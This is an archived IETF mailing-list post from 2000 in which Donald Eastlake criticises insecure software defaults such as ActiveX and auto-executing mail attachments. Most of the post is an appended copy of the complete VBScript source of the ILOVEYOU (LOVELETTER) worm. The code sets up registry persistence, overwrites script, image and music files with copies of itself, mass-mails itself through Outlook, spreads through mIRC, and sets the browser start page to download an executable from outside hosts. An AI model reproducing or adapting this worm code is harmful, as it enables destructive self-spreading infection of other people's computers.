ietf
[Top] [All Lists]

Security insanity

2000-05-04 11:02:58

It's not switching to UNIX, its avoiding secuirty insanity like
AcitveX, self-extracting binaries, automatically executing attachemnts
on opening on opening mail, as apparently Outlook does, etc.  A few
seconds thought would tell anyone with a clue what a bad idea these
are.

It is just insane that vast parts of the computing capacity of the world
can be damaged this badly and this trivially.

Donald

PS:  Appended below is the virus in a hopefully non-virulent form.

Donald,

The whole world will not switch over to Unix 
- the average user will always be more confortable with Windows 
unless Unix will at one point offer the same  seamless user-friendliness. 
So it will always be a problem, one which cannot be solved by telling 
others not to use what they've accustomed to - and one which cannot be
ignored.

Lillian Komlossy                     
Site Manager                         
http://www.dmnews.com           
http://www.imarketingnews.com  
(212) 925-7300 ext. 232 

=====================================================================
 Donald E. Eastlake 3rd                      
dee3(_at_)torque(_dot_)pothole(_dot_)com
 140 Forest Avenue                                +1 914-276-2668(h)
 Hudson, MA 01749 USA                             +1 508-261-5434(w)

q MIME-Version: 1.0
q X-Mailer: Internet Mail Service (5.5.2448.0)
q Content-Type: multipart/mixed;
q       boundary="----_=_NextPart_000_01BFB5DE.957A65A0"
q 
q This message is in MIME format. Since your mail reader does not understand
q this format, some or all of this message may not be legible.
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: text/plain
q 
q 
q kindly check the attached LOVELETTER coming from me.
q 
q 
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: application/octet-stream;
q       name="LOVE-LETTER-FOR-YOU.TXT.vbs"
q Content-Transfer-Encoding: quoted-printable
q Content-Disposition: attachment;
q       filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
q 
q rem  barok -loveletter(vbe) <i hate go to school>
q rem                   by: spyder  /  ispyder(_at_)mail(_dot_)com  /  
@GRAMMERSoft Group  /  =
q Manila,Philippines
q On Error Resume Next
q dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
q eq=3D""
q ctr=3D0
q Set fso =3D CreateObject("Scripting.FileSystemObject")
q set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
q vbscopy=3Dfile.ReadAll
q main()
q sub main()
q On Error Resume Next
q dim wscr,rr
q set wscr=3DCreateObject("WScript.Shell")
q rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
q Scripting Host\Settings\Timeout")
q if (rr>=3D1) then
q wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
q Host\Settings\Timeout",0,"REG_DWORD"
q end if
q Set dirwin =3D fso.GetSpecialFolder(0)
q Set dirsystem =3D fso.GetSpecialFolder(1)
q Set dirtemp =3D fso.GetSpecialFolder(2)
q Set c =3D fso.GetFile(WScript.ScriptFullName)
q c.Copy(dirsystem&"\MSKernel32.vbs")
q c.Copy(dirwin&"\Win32DLL.vbs")
q c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q regruns()
q html()
q spreadtoemail()
q listadriv()
q end sub
q sub regruns()
q On Error Resume Next
q Dim num,downread
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
q el32",dirsystem&"\MSKernel32.vbs"
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
q s\Win32DLL",dirwin&"\Win32DLL.vbs"
q downread=3D""
q downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Download Directory")
q if (downread=3D"") then
q downread=3D"c:\"
q end if
q if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
q Randomize
q num =3D Int((4 * Rnd) + 1)
q if num =3D 1 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
q hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
q elseif num =3D 2 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
q erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
q elseif num =3D 3 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
q QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
q elseif num =3D 4 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
q GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
q -BUGSFIX.exe"
q end if
q end if
q if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
q GSFIX",downread&"\WIN-BUGSFIX.exe"
q regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Main\Start Page","about:blank"
q end if
q end sub
q sub listadriv
q On Error Resume Next
q Dim d,dc,s
q Set dc =3D fso.Drives
q For Each d in dc
q If d.DriveType =3D 2 or d.DriveType=3D3 Then
q folderlist(d.path&"\")
q end if
q Next
q listadriv =3D s
q end sub
q sub infectfiles(folderspec) =20
q On Error Resume Next
q dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
q set f =3D fso.GetFolder(folderspec)
q set fc =3D f.Files
q for each f1 in fc
q ext=3Dfso.GetExtensionName(f1.path)
q ext=3Dlcase(ext)
q s=3Dlcase(f1.name)
q if (ext=3D"vbs") or (ext=3D"vbe") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
q or (ext=3D"sct") or (ext=3D"hta") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q bname=3Dfso.GetBaseName(f1.path)
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(folderspec&"\"&bname&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"jpg") or (ext=3D"jpeg") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(f1.path&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"mp3") or (ext=3D"mp2") then
q set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
q mp3.write vbscopy
q mp3.close
q set att=3Dfso.GetFile(f1.path)
q att.attributes=3Datt.attributes+2
q end if
q if (eq<>folderspec) then
q if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
q (s=3D"script.ini") or (s=3D"mirc.hlp") then
q set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
q scriptini.WriteLine "[script]"
q scriptini.WriteLine ";mIRC Script"
q scriptini.WriteLine ";  Please dont edit this script... mIRC will =
q corrupt, if mIRC will"
q scriptini.WriteLine "     corrupt... WINDOWS will affect and will not =
q run correctly. thanks"
q scriptini.WriteLine ";"
q scriptini.WriteLine ";Khaled Mardam-Bey"
q scriptini.WriteLine ";http://www.mirc.com";
q scriptini.WriteLine ";"
q scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
q scriptini.WriteLine "n1=3D  /if ( $nick =3D=3D $me ) { halt }"
q scriptini.WriteLine "n2=3D  /.dcc send $nick =
q "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
q scriptini.WriteLine "n3=3D}"
q scriptini.close
q eq=3Dfolderspec
q end if
q end if
q next =20
q end sub
q sub folderlist(folderspec) =20
q On Error Resume Next
q dim f,f1,sf
q set f =3D fso.GetFolder(folderspec) =20
q set sf =3D f.SubFolders
q for each f1 in sf
q infectfiles(f1.path)
q folderlist(f1.path)
q next =20
q end sub
q sub regcreate(regkey,regvalue)
q Set regedit =3D CreateObject("WScript.Shell")
q regedit.RegWrite regkey,regvalue
q end sub
q function regget(value)
q Set regedit =3D CreateObject("WScript.Shell")
q regget=3Dregedit.RegRead(value)
q end function
q function fileexist(filespec)
q On Error Resume Next
q dim msg
q if (fso.FileExists(filespec)) Then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q function folderexist(folderspec)
q On Error Resume Next
q dim msg
q if (fso.GetFolderExists(folderspec)) then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q sub spreadtoemail()
q On Error Resume Next
q dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
q set regedit=3DCreateObject("WScript.Shell")
q set out=3DWScript.CreateObject("Outlook.Application")
q set mapi=3Dout.GetNameSpace("MAPI")
q for ctrlists=3D1 to mapi.AddressLists.Count
q set a=3Dmapi.AddressLists(ctrlists)
q x=3D1
q regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
q if (regv=3D"") then
q regv=3D1
q end if
q if (int(a.AddressEntries.Count)>int(regv)) then
q for ctrentries=3D1 to a.AddressEntries.Count
q malead=3Da.AddressEntries(x)
q regad=3D""
q regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
q ad)
q if (regad=3D"") then
q set male=3Dout.CreateItem(0)
q male.Recipients.Add(malead)
q male.Subject =3D "ILOVEYOU"
q male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
q me."
q male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q male.Send
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
q end if
q x=3Dx+1
q next
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q else
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q end if
q next
q Set out=3DNothing
q Set mapi=3DNothing
q end sub
q sub html
q On Error Resume Next
q dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
q dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
q NAME=3D(_at_)-@Generator(_at_)-@ CONTENT=3D(_at_)-@BAROK VBS - 
LOVELETTER(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Author(_at_)-@ CONTENT=3D(_at_)-@spyder ?-? 
ispyder(_at_)mail(_dot_)com ?-? =
q @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000(_at_)-@>"&vbcrlf& =
q _
q "<META NAME=3D(_at_)-@Description(_at_)-@ CONTENT=3D(_at_)-@simple but i 
think this is =
q good(_dot_)(_dot_)(_dot_)(_at_)-@>"&vbcrlf& _
q "<?-?HEAD><BODY =
q ONMOUSEOUT=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
q "ONKEYDOWN=3D(_at_)-@window.name=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D(_at_)-@fixed(_at_)-@ =
q BGCOLOR=3D(_at_)-@#FF9933(_at_)-@>"&vbcrlf& _
q "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
q read this HTML file<BR>- Please press #-#YES#-# button to Enable =
q ActiveX<?-?p>"&vbcrlf& _
q "<?-?CENTER><MARQUEE LOOP=3D(_at_)-@infinite(_at_)-@ =
q 
BGCOLOR=3D(_at_)-@yellow(_at_)-@>----------z--------------------z----------<?-?MAR=
q QUEE> "&vbcrlf& _
q "<?-?BODY><?-?HTML>"&vbcrlf& _
q "<SCRIPT language=3D(_at_)-@JScript(_at_)-@>"&vbcrlf& _
q "<!--?-??-?"&vbcrlf& _
q "if (window.screen){var wi=3Dscreen.availWidth;var =
q hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
q rlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"&vbcrlf& _
q "<SCRIPT LANGUAGE=3D(_at_)-@VBScript(_at_)-@>"&vbcrlf& _
q "<!--"&vbcrlf& _
q "on error resume next"&vbcrlf& _
q "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
q "aw=3D1"&vbcrlf& _
q "code=3D"
q dta2=3D"set =
q fso=3DCreateObject(@-(_at_)Scripting(_dot_)FileSystemObject@-@)"&vbcrlf& _
q "set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
q "code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
q "code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
q "code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
q "set =
q 
wri=3Dfso.CreateTextFile(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)"&vbcrlf& 
_
q "wri.write code4"&vbcrlf& _
q "wri.close"&vbcrlf& _
q "if (fso.FileExists(dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@)) 
then"&vbcrlf& _
q "if (err.number=3D424) then"&vbcrlf& _
q "aw=3D0"&vbcrlf& _
q "end if"&vbcrlf& _
q "if (aw=3D1) then"&vbcrlf& _
q "document.write @-(_at_)ERROR: can#-#t initialize ActiveX(_at_)-@"&vbcrlf& _
q "window.close"&vbcrlf& _
q "end if"&vbcrlf& _
q "end if"&vbcrlf& _
q "Set regedit =3D CreateObject(@-(_at_)WScript(_dot_)Shell@-@)"&vbcrlf& _
q "regedit.RegWrite =
q @-(_at_)HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
q 
-^Run^-^MSKernel32(_at_)-@,dirsystem&@-(_at_)^-^MSKernel32(_dot_)vbs@-@"&vbcrlf&
 _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"
q dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
q dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
q dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
q dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
q dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
q dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
q dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
q dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
q set fso=3DCreateObject("Scripting.FileSystemObject")
q set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
q lines=3DSplit(c.ReadAll,vbcrlf)
q l1=3Dubound(lines)
q for n=3D0 to ubound(lines)
q lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
q lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
q lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
q if (l1=3Dn) then
q lines(n)=3Dchr(34)+lines(n)+chr(34)
q else
q lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
q end if
q next
q set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
q b.close
q set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
q d.write dt5
q d.write join(lines,vbcrlf)
q d.write vbcrlf
q d.write dt6
q d.close
q end sub
q ------_=_NextPart_000_01BFB5DE.957A65A0--



<Prev in Thread] Current Thread [Next in Thread>